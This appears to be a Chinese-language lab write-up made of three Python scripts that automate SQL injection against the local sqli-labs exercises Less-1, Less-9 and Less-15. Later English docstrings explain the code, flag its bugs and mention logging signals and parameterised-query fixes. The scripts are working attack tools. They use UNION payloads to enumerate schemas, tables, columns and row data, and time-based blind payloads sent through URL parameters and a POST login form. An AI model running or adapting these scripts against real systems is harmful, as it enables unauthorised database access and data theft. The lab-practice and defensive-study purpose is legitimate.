虽然这个很简单,但是还是写个脚本跑一下
Less-1
from http.client import PROCESSING, responses
from re import I, T
from typing import FrozenSet
from bs4.dammit import xml_encoding
from bs4.element import ProcessingInstruction
import requests
import urllib.request
from colorama import init, Fore, Back, Style
from requests.api import get
import bs4
import lxml
# payload = 'abcdefghijklmnopqrstuvwxyz~!@#$%^&*()<>?|,./`'
'''打开网页'''
def send_request(url: str) -> str:
    """Fetch ``url + '--+'`` and return the response body as text.

    The caller passes a URL whose query string already ends in a quote; the
    ``--+`` suffix is appended so that the remainder of the server-side SQL
    statement is treated as a comment.  The body is read, decoded as UTF-8
    and returned unchanged -- nothing is parsed here.

    NOTE(review): no timeout is set and no status is checked; ``urlopen``
    raises ``HTTPError`` on an error status, which is not handled.  The
    server-side defect this exercises is string-built SQL; the durable fix
    is a parameterised query in the application, not input filtering.
    """
    res = urllib.request.urlopen(url+ '--+')
    result = str(res.read().decode('utf-8'))
    # print(result)  -- would dump the page source
    return result
'''order by 查看注入点'''
def order_by_N(url: str) -> int:
    """Probe ``order by 1..100`` and return the last index that still rendered.

    For each ``i`` the page ``url + 'order by ' + str(i) + '--+'`` is fetched
    with ``requests.get`` and parsed with BeautifulSoup.  The element carrying
    ``size="3"`` is located and ``a`` records whether its text contains
    ``'Login'``.  While it does, ``flag`` is set to ``i`` and ``i`` is printed;
    the first ``i`` for which it does not ends the loop.  ``flag`` (the last
    index that matched) is returned; the "检测到注入点" line prints ``i-1``.

    NOTE(review): indentation was lost in extraction and is reconstructed
    here; the final print is assumed to follow the loop.
    NOTE(review): ``soup.find(size='3')`` returns None when no such element
    exists and ``content.text`` then raises AttributeError -- the lab page
    layout is assumed, not checked.  ``a == True`` / ``a == False`` are plain
    truth tests written long-hand.  No timeout on the requests.
    From a monitoring standpoint this is a burst of up to 100 near-identical
    requests differing only in the ORDER BY index -- a well-known column-count
    probe that stands out in access logs.
    """
    flag = 0
    for i in range(1,101):
        # print(i)
        sql = url + 'order by ' +str(i) + '--+'
        # print(i)
        result = requests.get(sql)
        # result1= send_request( url + 'order by ' +str(i) + '--+')
        # print(result)  -- would print the response object (200 status)
        # print(sql)  -- would print the injected URL
        soup = bs4.BeautifulSoup(result.content,'lxml')
        # print(soup.prettify())
        content = soup.find(size = '3')
        # print(str(content.text))
        a='Login' in str(content.text)
        # print(a)
        if a == True:
            flag = i
            print(i)
        elif a == False:
            break
    print("检测到注入点"+str(i-1))
    return flag
'''获得数据库名称'''
def get_database(sql_url: str) -> None:
    """Send a fixed UNION payload over ``information_schema.schemata`` and print the result.

    The literal ``union select 1,2,group_concat(schema_name) ...`` string is
    appended to *sql_url*, the URL is printed and fetched, and the text of the
    element carrying ``size="5"`` is printed.  Nothing is returned.

    NOTE(review): ``soup.find(size='5')`` may return None, in which case
    ``content.text`` raises AttributeError; no timeout or status check.
    The payload is assembled by plain concatenation on the client -- the same
    construction that makes the target vulnerable.  Server-side, parameterised
    queries plus a least-privilege database account (which also limits what
    ``information_schema`` reveals) remove this class of disclosure.
    """
    sql_database=sql_url+'union select 1,2,group_concat(schema_name) from information_schema.schemata --+'
    print("[正在执行SQL语句:]"+sql_database)
    result = requests.get(sql_database)
    soup = bs4.BeautifulSoup(result.content,'lxml')
    content = soup.find(size = '5')
    print("爆破结果如下:"+content.text)
    # the database list has now been printed
'''爆破数据库'''
def get_table(sql_url: str) -> None:
    """Interactive UNION-based enumeration: tables, then columns, then row contents.

    Three prompts are answered in turn -- a schema name (``I``), a table name
    (``J``) and a column name (``K``) -- and each answer is ``%``-interpolated
    into a ``union select 1,2,group_concat(...)`` payload that is appended to
    *sql_url*, printed, fetched with ``requests.get`` and parsed; the text of
    the element carrying ``size="5"`` is printed.  Only the last stage is
    wrapped in ``try/except Exception`` (a missing element prints a generic
    message); the first two stages would raise AttributeError on
    ``content.text``.  Nothing is returned.

    NOTE(review): the ``# def get_column`` and ``# def get_content`` lines are
    commented out, so all three stages form one function body sharing ``I``
    and ``J``; indentation was lost in extraction and is reconstructed here on
    that reading.  ``I`` shadows the ``re.I`` flag imported at the top of the
    file.  No timeout or status check on any request.  The typed names go into
    the statement unquoted and unescaped, so a stray quote in an answer
    simply breaks the query.
    """
    I = input("请输入想要注入的数据库:")
    sql_table = sql_url+ " union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = '%s' --+" %I
    print("[正在执行SQL语句:]"+sql_table)
    result = requests.get(sql_table)
    soup = bs4.BeautifulSoup(result.content,'lxml')
    content = soup.find(size = '5')
    print("爆破结果如下:"+content.text)
    # the list of tables has been printed
    # '''enumerate the columns of a table'''
    # def get_column(sql_url):
    J = input("请输入想要查看到表:")
    sql_column= sql_url+ "union select 1,2,group_concat(column_name) from information_schema.columns where table_name = '%s' --+" %J
    print("[正在执行SQL语句:]" + sql_column)
    result = requests.get(sql_column)
    soup = bs4.BeautifulSoup(result.content,'lxml')
    content = soup.find(size = '5')
    print("爆破结果如下:"+content.text)
    # '''enumerate a table's columns and fetch their contents'''
    # def get_content(sql_url):
    K = input("请输入你想要查看到字段内容:")
    sql_content = sql_url + "union select 1,2,group_concat(%s) from %s.%s --+ " %(K,I,J)
    print("[正在执行SQL语句:]"+sql_content)
    result = requests.get(sql_content)
    soup = bs4.BeautifulSoup(result.content,'lxml')
    try:
        content = soup.find(size = '5')
        print("爆破结果如下:"+content.text)
    except Exception:
        print("你输入的有错误哦!!")
if __name__=="__main__":
    # Script entry point.  The targets are hard-coded local sqli-labs URLs
    # (Less-1); the input() prompts that would take a URL are commented out.
    # url = str(input("enter the URL that has the SQL injection flaw:"))
    url = "http://127.0.0.1/sqli-labs/Less-1/?id=1'"
    # sql_url = str(input("string-type SQL input:"))
    # NOTE(review): this literal starts with a space -- presumably tolerated
    # because requests strips leading whitespace from URLs, but it is a typo.
    sql_url = " http://127.0.0.1/sqli-labs/Less-1/?id=-1'"
    send_request(url)   # return value (page body) is discarded
    order_by_N(url)     # return value (column index) is discarded
    get_database(sql_url)
    get_table(sql_url)
    # get_column(sql_url)   # no longer a function: its body is folded into get_table
    # get_content(sql_url)  # likewise
Less-9
时间盲注
import requests
import time
import datetime
#匹配时间较长 耐心等待 耐心等待 !!!!!
# Hard-coded lab target (sqli-labs Less-9) and the candidate alphabet used by
# every character-by-character probe below.  Only lowercase a-z is tried, so
# a position holding any other character finds no match and is skipped.
url = "http://127.0.0.1/sqli-labs/Less-9/"
p1 = 'abcdefghijklmnopqrstuvwxyz'
#获取数据库长度
def database_len() -> None:
    """Infer ``length(database())`` from response latency and print it.

    For ``i`` in 1..9 a request carrying ``if(length(database())>i, sleep(4), 0)``
    is sent and timed with ``time.time()``.  A delay of at least 4 s is read as
    "length > i" and the loop continues; the first fast response ends the loop
    and ``i`` is printed as the length.  Nothing is returned.

    NOTE(review): indentation reconstructed; the final print is assumed to
    follow the loop.  If no iteration breaks (length of 9 or more) the print
    still reports 9.  The oracle is wall-clock latency only, so any network
    jitter feeds straight into the answer.  ``r`` is assigned but never read
    and the response body is never examined.  For defenders: the body carries
    no signal, but the timing does -- a series of requests each taking either
    ~4 s or ~0 s, with ``sleep(`` in the query string.
    """
    for i in range(1,10):
        payload = "?id=1' and if(length(database())>%s,sleep(4),0)--+"%i
        url1 = url +payload
        #print(url1)
        time1 =time.time()
        r=requests.get(url=url1)
        time2=time.time()
        time3 = time2-time1
        if time3 >= 4:
            print(i)
        else:
            print(i)
            break
    print('数据库长度为:',i)
#database_len()
#获取数据库名
def datebase_name() -> None:
    """Recover ``database()`` one character at a time by latency and print it.

    Positions 1..8 are tried in order; for each, every letter ``j`` of ``p1``
    is tested with ``if(substr(database(),i,1)='j', sleep(4), 1)``.  A response
    of at least 4 s accepts the letter, appends it to ``database_name`` and
    moves to the next position.  The result is printed with the
    "数据库名字为:" prefix.  Nothing is returned.

    NOTE(review): indentation reconstructed; ``n = database_name`` and the
    print are assumed to follow the outer loop.  The function name is a typo
    of ``database_name`` (kept as-is: it is called by this name below).
    ``r`` is unused.  A position that matches no letter of ``p1`` is silently
    skipped, so the printed name may be shorter than the real one.
    """
    database_name=''
    for i in range(1,9):
        for j in p1:
            payload="?id=1' and if(substr(database(),%s,1)='%s',sleep(4),1)--+" %(i,j)
            url1=url+payload
            #print(url1)
            time1=time.time()
            r=requests.get(url=url1)
            time2=time.time()
            time3=time2-time1
            if time3 >= 4:
                database_name += j
                # print(database_name)
                break
    n = database_name
    print('数据库名字为:'+n)
#datebase_name()
#获取表
def tables_name() -> None:
    """Recover up to four table names (7 characters each) by latency and print them.

    ``i`` selects row ``limit i,1`` of ``information_schema.tables`` for the
    current schema, ``j`` the character position and ``t`` the candidate letter
    from ``p1``; the server sleeps 3 s on a match.  Matches for ``i`` 0..3 are
    appended to ``table1``..``table4``.  Row 4 is probed as well but its
    letters are never stored.  Nothing is returned.

    NOTE(review): ``global table4`` is declared, but no other function on this
    page reads ``table4``.  ``r`` is unused.  Indentation was lost in
    extraction; the trailing ``else: break`` is placed here as the last branch
    of the ``if i == ...`` chain (the only placement under which rows 0..3 can
    be collected), and the four prints are assumed to follow the outer loop.
    Unlike ``datebase_name`` there is no ``break`` after a match, so the
    remaining letters of ``p1`` are still sent for that position.
    """
    global table4
    table1=''
    table2=''
    table3=''
    table4=''
    for i in range(5):
        for j in range(1,8):
            for t in p1:
                payload="?id=1' and sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1)='%s'),3,0)) --+"%(i,j,t)
                url1=url+payload
                #print(url1)
                time1=time.time()
                r=requests.get(url=url1)
                time2=time.time()
                time3=time2-time1
                if time3 >= 3:
                    if i == 0:
                        table1 +=t
                        # print('table 1:', table1)
                    elif i == 1:
                        table2 += t
                        # print('table 2:', table2)
                    elif i == 2:
                        table3 +=t
                        # print('table 3:', table3)
                    elif i == 3:
                        table4 += t
                        # print('table 4:', table4)
                    else:
                        break
    print('第一个表为' + table1)
    print('第二个表为' + table2)
    print('第三个表为' + table3)
    print('第四个表为' + table4)
#tables_name()
#获取表中的字段 和 内容
def table_column() -> None:
    """Recover three column names of a typed table, then one row of a typed column, by latency.

    Stage 1: the user types a table name ``f``.  For ``i`` in 0..2 (row of
    ``information_schema.columns`` for schema ``'security'`` and table ``f``),
    ``j`` in 1..9 (position) and ``t`` in ``p1``, the server sleeps 5 s on a
    match and the letter is appended to ``column1``..``column3``; the three
    names are then printed.
    Stage 2 (the former ``s_content``, whose ``def`` is commented out so it
    now runs inside this function and reuses ``f``): the user types a column
    name ``f1``; row ``limit 7,1`` of ``select f1 from f`` is read one
    character at a time (3 s sleep on a match, ``break`` after it) into
    ``content1`` and printed.  Nothing is returned.

    NOTE(review): ``global column3`` is declared but no other function reads
    it.  ``r`` is unused.  The schema name ``'security'`` is hard-coded while
    ``f``/``f1`` are interpolated unquoted into the statement.  Stage 2 probes
    position ``i`` from 0, and MySQL string positions presumably start at 1,
    so the first iteration never matches -- confirm.  Indentation was lost in
    extraction; the ``else: break`` in stage 1 is placed as the last branch of
    the ``if i == ...`` chain, and the prints are assumed to follow the loops.
    """
    global column3
    column1=''
    column2=''
    column3=''
    f=str(input("请输入表的名称:"))
    for i in range(3):
        for j in range(1,10):
            for t in p1:
                payload="?id=1' and sleep(if((mid((select column_name from information_schema.columns where table_schema = 'security' and table_name='%s' limit %s,1),%s,1)='%s'),5,0)) --+"%(f,i,j,t)
                url1 =url+payload
                #print(url1)
                time1 = time.time()
                r = requests.get(url=url1)
                time2 = time.time()
                time3 = time2 - time1
                if time3 >= 5:
                    if i == 0:
                        column1 += t
                        # print('column 1:'+column1)
                    elif i == 1:
                        column2 += t
                        # print('column 2:'+column2)
                    elif i == 2:
                        column3 += t
                        # print('column 3:'+column3)
                    else:
                        break
    # print(column1,column2,column3)
    print('字段一为:'+column1)
    print('字段二为:'+column2)
    print('字段三为:',column3)
    # def s_content():  -- commented out: the body below runs inside table_column
    content1=''
    f1= str(input("请输入字段名称:"))
    # f= str(input("enter the table name:"))
    for i in range(20):
        for t in p1:
            payload = "?id=1' and sleep(if((mid((select %s from %s limit 7,1),%s,1)='%s'),3,0)) --+"%(f1,f,i,t)
            url1 =url+payload
            #print(url1)
            time1=time.time()
            r = requests.get(url=url1)
            time2 = time.time()
            time3 = time2-time1
            if time3 >=3:
                content1 += t
                # print('column contents:'+content1)
                break
    print('字段内容为:'+content1)
# Driver: record a start time, then run the four latency-based stages in
# order.  `start_time` is never reported, so no elapsed time is printed.
# s_content() is no longer a function (its def is commented out); its body
# runs at the end of table_column().  There is no __main__ guard.
start_time=time.time()
database_len()
datebase_name()
tables_name()
table_column()
# s_content()
Less-15
import requests,datetime
import time
##匹配时间较长 耐心等待 耐心等待 !!!!!
# Hard-coded lab target (sqli-labs Less-15, a POST login form taking `uname`
# and `passwd`) and the candidate alphabet (a-z plus underscore) used by every
# probe below.
url = "http://127.0.0.1/sqli-labs/Less-15/"
char = "abcdefghijklmnopqrstuvwxyz_"
print("start!")
def get_database(url: str, char: str) -> None:
    """Recover up to 7 schema names (19 characters each) through a POST login form by latency.

    For row ``i`` of ``information_schema.schemata`` and position ``j``, each
    candidate of *char* is sent in the ``uname`` field as
    ``If(mid(...)='c', 1, sleep(0.2))`` with ``passwd`` fixed to ``"1"``.  The
    oracle is the opposite of the Less-9 script on this page: a *fast*
    response (under 0.2 s) means the candidate matched; it is appended,
    printed, and the next position is tried.  Each completed name is printed
    with its row index.  Nothing is returned.

    NOTE(review): the loop variable ``str`` shadows the builtin for the whole
    function body.  ``res`` is unused and no timeout is set.  Indentation
    reconstructed; the per-row prints are assumed to sit inside the ``i`` loop.
    Because the payload travels in the POST body it does not show in a
    URL-only access log; the volume of login POSTs and their latency pattern
    are the observable signal.
    """
    for i in range(0,7):
        database = ""
        for j in range(1,20):
            for str in char:
                # print(str)
                time1 = time.time()
                data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
                res = requests.post(url,data=data)
                # print(res.text)
                time2 = time.time()
                sec = time2 - time1
                if sec<0.2:
                    database += str
                    print(database)
                    break
        print("the %d database: "%i)
        print(database)
    print("end!")
def tabele_name(url: str, char: str) -> None:
    """Recover up to 4 table names (9 characters each) of the current schema by latency.

    Same mechanism as ``get_database`` above: row ``i`` of
    ``information_schema.tables where table_schema=database()``, position
    ``j``, candidate ``str``; a response under 0.2 s accepts the candidate.
    Each completed name is printed with its row index.  Nothing is returned.

    NOTE(review): the name is a typo of ``table_name`` (kept: it is called by
    this name below).  ``str`` shadows the builtin; ``res`` is unused; no
    timeout.  Indentation reconstructed.
    """
    for i in range(0,4):
        table_name = ""
        for j in range(1,10):
            for str in char:
                # print(str)
                time1 = time.time()
                # data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
                data = {'uname':"admin'and If((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
                res = requests.post(url,data=data)
                # print(res.text)
                time2 = time.time()
                sec = time2 - time1
                if sec<0.2:
                    table_name += str
                    print(table_name)
                    break
        print("the %d table_name: "%i)
        print(table_name)
    print("end!")
'''获得 字段 + 内容 '''
def get_column(url: str, char: str) -> None:
    """Recover column names of a typed table, then values of a typed column, by latency.

    Stage 1: the user types a table name ``I``; for rows 0..3 of
    ``information_schema.columns`` (schema hard-coded to ``'security'``),
    positions 1..9 and each candidate of *char*, a response under 0.2 s
    accepts the candidate.  Each column name is printed with its index.
    Stage 2 (the former ``get_content``, whose ``def`` is commented out so it
    now runs inside this function and reuses ``I``): the user types a column
    name ``M``; rows 0..3 of ``select M from I`` are read 9 characters each
    and printed.  Nothing is returned.

    NOTE(review): ``I`` and ``M`` are interpolated unquoted into the statement.
    ``str`` shadows the builtin; ``res`` is unused; no timeout.  Indentation
    reconstructed; the per-row prints are assumed to sit inside each ``i``
    loop and the two ``print("end!")`` calls after them.
    """
    I = input("请输入表名:")
    for i in range(0,4):
        column_name = ""
        for j in range(1,10):
            for str in char:
                # print(str)
                time1 = time.time()
                # data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
                # data = {'uname':"admin'and If((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
                data = {'uname':"admin'and If((mid((select column_name from information_schema.columns where table_schema = 'security' and table_name='%s' limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(I,i,j,str),'passwd':"1"}
                res = requests.post(url,data=data)
                # print(res.text)
                time2 = time.time()
                sec = time2 - time1
                if sec<0.2:
                    column_name += str
                    print(column_name)
                    break
        print("the %d column_name: "%i)
        print(column_name)
    print("end!")
    # def get_content(url,char):  -- commented out: the body below runs inside get_column
    # I = input("enter the table name:")
    M = input("请输入字段名:")
    for i in range(0,4):
        end_content = ""
        for j in range(1,10):
            for str in char:
                # print(str)
                time1 = time.time()
                # data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
                # data = {'uname':"admin'and If((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
                # data = {'uname':"admin'and If((mid((select column_name from information_schema.columns where table_schema = 'security' and table_name='%s' limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(I,i,j,str),'passwd':"1"}
                data = {'uname':"admin'and If((mid((select %s from %s limit %s,1),%d,1))='%s',1,sleep(0.2))#" %(M,I,i,j,str),'passwd':"1"}
                res = requests.post(url,data=data)
                # print(res.text)
                time2 = time.time()
                sec = time2 - time1
                if sec<0.2:
                    end_content += str
                    print(end_content)
                    break
        print("the %d end_content: "%i)
        print(end_content)
    print("end!")
# Driver: the three stages run unconditionally at import time (no __main__
# guard).  get_content() is no longer a function (its def is commented out);
# its body runs at the end of get_column().
get_database(url,char)
tabele_name(url,char)
get_column(url,char)
# get_content(url,char)



